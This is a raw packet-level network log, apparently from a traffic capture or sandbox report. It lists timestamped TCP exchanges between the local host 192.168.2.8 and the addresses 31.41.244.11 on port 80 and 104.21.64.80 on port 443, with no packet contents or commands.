Dec 18, 2024 13:38:39.760036945 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.760087967 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.760524035 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.760586977 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.761198997 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.761250019 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.761931896 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.761945963 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.761986017 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.763242006 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.763262987 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.763303041 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.764659882 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.764673948 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.764709949 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.765595913 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.765609026 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.765651941 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.766593933 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.766608000 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.766647100 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.767791986 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.767805099 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.767855883 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.768744946 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.768785000 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.768793106 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.768830061 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.769648075 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.769661903 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.769699097 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.770849943 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.770862103 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.770904064 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.771723032 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.771735907 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.771775007 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.772546053 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.772558928 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.772597075 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.773541927 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.773576021 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.773622036 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.774497986 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.774512053 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.774549961 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.775723934 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.775736094 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.775775909 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.776937008 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.776949883 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.776988029 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.778178930 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.778198004 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.778229952 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.778255939 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.779134035 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.779148102 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.779186010 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.780421019 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.780433893 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.780443907 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.780472994 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.780487061 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.781373978 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.781392097 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.781426907 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.781439066 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.782448053 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.782465935 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.782496929 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.782509089 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.783247948 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.783262014 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.783299923 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.784285069 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.784297943 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.784307957 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.784337044 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.784352064 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.785607100 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.785620928 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.785659075 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.786492109 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.786506891 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.786547899 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.787586927 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.787599087 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.787640095 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.788680077 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.788692951 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.788732052 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.789774895 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.789788008 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.789798975 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.789829969 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.789844990 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.790899992 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.790955067 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.790955067 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.791002989 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.791969061 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.791981936 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.792026043 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.793138981 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.793183088 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.793190002 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.793226004 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.794361115 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.794373989 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.794413090 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.794426918 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.795290947 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.795305014 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.795341969 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.796341896 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.796356916 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.796366930 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.796395063 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.796407938 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.797540903 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.797554016 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.797595978 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.798533916 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.798547983 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.798588037 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.799681902 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.799696922 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.799736023 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.800868988 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.800883055 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.800892115 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.800924063 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.800940037 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.801876068 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.801888943 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.801930904 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.803024054 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.803037882 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.803078890 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.804058075 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.804070950 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.804105997 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.805080891 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.805094004 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.805135012 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.818473101 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.818645954 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.818692923 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.818747997 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.819241047 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.819294930 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.819710016 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.819760084 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.820301056 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.820317984 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.820348978 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.820364952 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.821196079 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.821243048 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.821727037 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.821831942 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.822215080 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.822227955 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.822267056 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.823169947 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.823220015 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.823635101 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.823683023 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.824114084 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.824126959 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.824161053 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.824174881 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.950433016 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.950500965 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.950653076 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.950705051 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.951160908 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.951212883 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.951720953 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.951770067 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.952140093 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.952188015 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.952640057 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.952686071 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.953130007 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.953172922 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.953532934 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.953579903 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.953962088 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.954011917 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.954181910 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.954194069 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.954226971 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.954247952 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.955178022 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.955224991 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.955718040 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.955765963 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.956222057 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.956269979 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.956856966 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.956907988 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.957313061 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.957325935 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.957362890 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.958368063 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.958380938 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.958426952 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.959177971 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.959212065 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.959230900 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.959258080 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.960207939 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.960220098 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.960269928 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.961167097 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.961179972 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.961220026 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.962137938 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.962151051 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.962188005 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.963094950 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.963107109 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.963143110 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.963171005 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.964098930 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.964111090 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.964152098 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.966265917 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.966279030 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.966319084 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.967232943 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.967279911 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.967282057 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.967324972 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.968094110 CET	443	49718	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:39.968180895 CET	49718	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:39.968266010 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.968277931 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.968312979 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.968338966 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.969333887 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.969347000 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.969391108 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.969603062 CET	49718	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:39.969608068 CET	443	49718	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:39.969842911 CET	443	49718	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:39.970413923 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.970427036 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.970473051 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.971055031 CET	49718	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:39.971225977 CET	49718	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:39.971246958 CET	443	49718	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:39.971553087 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.971565962 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.971610069 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.972613096 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.972625017 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.972635984 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.972666979 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.972681046 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.973808050 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.973858118 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.973860025 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.973908901 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.975096941 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.975145102 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.975148916 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.975198030 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.975991964 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.976005077 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.976042986 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.977010012 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.977022886 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.977063894 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.978442907 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.978456020 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.978467941 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.978497028 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.978529930 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.979228020 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.979240894 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.979279995 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.979310989 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.980485916 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.980498075 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.980547905 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.980564117 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.981446981 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.981458902 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.981519938 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.982522964 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.982536077 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.982546091 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.982572079 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.982609987 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.983634949 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.983648062 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.983692884 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.984747887 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.984761000 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.984800100 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.986027956 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.986041069 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.986083031 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.987356901 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.987370014 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.987416029 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.988467932 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.988481045 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.988492012 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.988533020 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.988555908 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.989324093 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.989337921 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.989379883 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.989392996 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.990621090 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.990634918 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.990674019 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.990686893 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.991574049 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.991586924 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.991631031 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.992458105 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.992470980 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.992546082 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.992588043 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.993603945 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.993617058 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.993652105 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.993664980 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.994637966 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.994648933 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.994688034 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.995707035 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.995721102 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.995764971 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.996846914 CET	80	49715	31.41.244.11	192.168.2.8
